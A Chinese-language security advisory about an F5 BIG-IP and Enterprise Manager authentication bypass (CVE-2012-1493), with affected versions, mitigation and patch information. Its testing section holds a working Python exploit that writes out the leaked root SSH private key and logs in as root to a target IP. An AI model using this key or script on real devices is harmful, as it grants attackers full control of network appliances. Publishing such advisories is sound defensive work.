安全研究

安全漏洞
F5 BIG-IP远程root用户验证绕过漏洞

发布日期:2012-06-11
更新日期:2012-06-12

受影响系统:
F5 BIG-IP LTM 9.0.0 - 9.4.8-HF4
F5 BIG-IP LTM 11.1.0 - 11.1.0-HF2
F5 BIG-IP LTM 11.0.0 - 11.0.0-HF1
F5 BIG-IP LTM 10.0.0 - 10.2.3-HF1
F5 BIG-IP GTM 9.2.2 - 9.4.8-HF4
F5 BIG-IP GTM 11.1.0 - 11.1.0-HF2
F5 BIG-IP GTM 11.0.0 - 11.0.0-HF1
F5 BIG-IP GTM 10.0.0 - 10.2.3-HF1
F5 BIG-IP ASM 9.2.2 - 9.4.8-HF4
F5 BIG-IP ASM 11.1.0 - 11.1.0-HF2
F5 BIG-IP ASM 11.0.0 - 11.0.0-HF1
F5 BIG-IP ASM 10.0.0 - 10.2.3-HF1
F5 BIG-IP Link Controller 9.2.2 - 9.4.8-HF4
F5 BIG-IP Link Controller 11.1.0 - 11.1.0-HF2
F5 BIG-IP Link Controller 11.0.0 - 11.0.0-HF1
F5 BIG-IP Link Controller 10.0.0 - 10.2.3-HF1
F5 BIG-IP PSM 9.2.2 - 9.4.8-HF4
F5 BIG-IP PSM 11.1.0 - 11.1.0-HF2
F5 BIG-IP PSM 11.0.0 - 11.0.0-HF1
F5 BIG-IP PSM 10.0.0 - 10.2.3-HF1
F5 BIG-IP WOM 11.1.0 - 11.1.0-HF2
F5 BIG-IP WOM 11.0.0 - 11.0.0-HF1
F5 BIG-IP WOM 10.0.0 - 10.2.3-HF1
F5 BIG-IP APM 11.1.0 - 11.1.0-HF2
F5 BIG-IP APM 11.0.0 - 11.0.0-HF1
F5 BIG-IP APM 10.0.0 - 10.2.3-HF1
F5 BIG-IP Edge Gateway 11.1.0 - 11.1.0-HF2
F5 BIG-IP Edge Gateway 11.0.0 - 11.0.0-HF1
F5 BIG-IP Edge Gateway 10.0.0 - 10.2.3-HF1
F5 BIG-IP Analytics 11.1.0 - 11.1.0-HF2
F5 BIG-IP Analytics 11.0.0 - 11.0.0-HF1
F5 Enterprise Manager 2.3.0 - 2.3.0-HF2
F5 Enterprise Manager 2.2.0 (no HF)
F5 Enterprise Manager 2.1.0 - 2.1.0-HF1
F5 Enterprise Manager 2.0.x
F5 Enterprise Manager 1.x
不受影响系统:
F5 BIG-IP LTM >= 9.4.8-HF5
F5 BIG-IP LTM >= 11.1.0-HF3
F5 BIG-IP LTM >= 11.0.0-HF2
F5 BIG-IP LTM >= 10.2.4
F5 BIG-IP GTM >=11.1.0-HF3
F5 BIG-IP GTM >=11.0.0-HF2
F5 BIG-IP GTM >=10.2.4
F5 BIG-IP GTM >= 9.4.8-HF5
F5 BIG-IP ASM >=11.1.0-HF3
F5 BIG-IP ASM >=11.0.0-HF2
F5 BIG-IP ASM >=10.2.4
F5 BIG-IP ASM >= 9.4.8-HF5
F5 BIG-IP Link Controller >=11.1.0-HF3
F5 BIG-IP Link Controller >=11.0.0-HF2
F5 BIG-IP Link Controller >=10.2.4
F5 BIG-IP Link Controller >= 9.4.8-HF5
F5 BIG-IP PSM >=11.1.0-HF3
F5 BIG-IP PSM >=11.0.0-HF2
F5 BIG-IP PSM >=10.2.4
F5 BIG-IP PSM >= 9.4.8-HF5
F5 BIG-IP WOM >=11.1.0-HF3
F5 BIG-IP WOM >=11.0.0-HF2
F5 BIG-IP WOM >=10.2.4
F5 BIG-IP APM >=11.1.0-HF3
F5 BIG-IP APM >=11.0.0-HF2
F5 BIG-IP APM >=10.2.4
F5 BIG-IP Edge Gateway >=11.1.0-HF3
F5 BIG-IP Edge Gateway >=11.0.0-HF2
F5 BIG-IP Edge Gateway >=10.2.4
F5 BIG-IP Analytics >=11.1.0-HF3
F5 BIG-IP Analytics >=11.0.0-HF2
F5 Enterprise Manager >= 2.3.0-HF3
F5 Enterprise Manager >= 2.2.0-HF1
F5 Enterprise Manager >= 2.1.0-HF2
描述:
BUGTRAQ  ID: 53897
CVE ID: CVE-2012-1493

F5 BIG-IP产品可为企业提供集成的应用交付服务,如加速、安全、访问控制与高可用性。

BIG-IP 11.x 10.x 9.x平台在实现上允许未验证用户绕过身份验证并以root用户登录到设备,对应下面公钥的SSH私钥是公开的,并出现在所有有漏洞的设备中:

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvIhC5skTzxyHif/7iy3yhxuK6/OB13hjPqrskogkYFrcW8OK4VJT+5+Fx7wd4sQCnVn8rNqahw/x6sfcOMDI/Xvn4yKU4t8TnYf2MpUVr4ndz39L5Ds1n7Si1m2suUNxWbKv58I8+NMhlt2ITraSuTU0NGymWOc8+LNi+MHXdLk= SCCP Superuser

其指纹码是:
71:3a:b0:18:e2:6c:41:18:4e:56:1e:fd:d2:49:97:66

如果攻击者获取设备完全控制权,则可进一步发动针对相关网络中其他主机的攻击。

<*来源:Florent Daigniere (nextgens@freenetproject.org
  
  链接:https://www.trustmatta.com/advisories/MATTA-2012-002.txt
        http://secunia.com/advisories/49396/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

ave Kennedy (ReL1K) 提供了如下测试方法:

#!/usr/bin/python
#
# Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
#
# Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
# http://www.secmaniac.com
#
#
import subprocess,os
  
filewrite = file("priv.key", "w")
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----""")
filewrite.close()
subprocess.Popen("chmod 700 priv.key", shell=True).wait()
  
ipaddr=raw_input("Enter the IP address of the F5: ")
subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait()
  
if os.path.isfile("priv.key"):
    os.remove("priv.key")

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 通过BIG-IP自身或者边界防火墙设置,仅允许可信任IP对SSH服务端口的访问。

厂商补丁:

F5
--
目前厂商已经在下列版本中修复了这个安全问题:
F5 BIG-IP 9.4.8-HF5 及之后版本
F5 BIG-IP 10.2.4 及之后版本
F5 BIG-IP 11.0.0-HF2 及之后版本
F5 BIG-IP 11.1.0-HF3 及之后版本
F5 Enterprise Manager 2.1.0-HF2 及之后版本
F5 Enterprise Manager 2.2.0-HF1 及之后版本
F5 Enterprise Manager 2.3.0-HF3 及之后版本

厂商安全公告地址:
http://support.f5.com/kb/en-us/solutions/public/13000/600/sol13600.html

浏览次数:24907
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障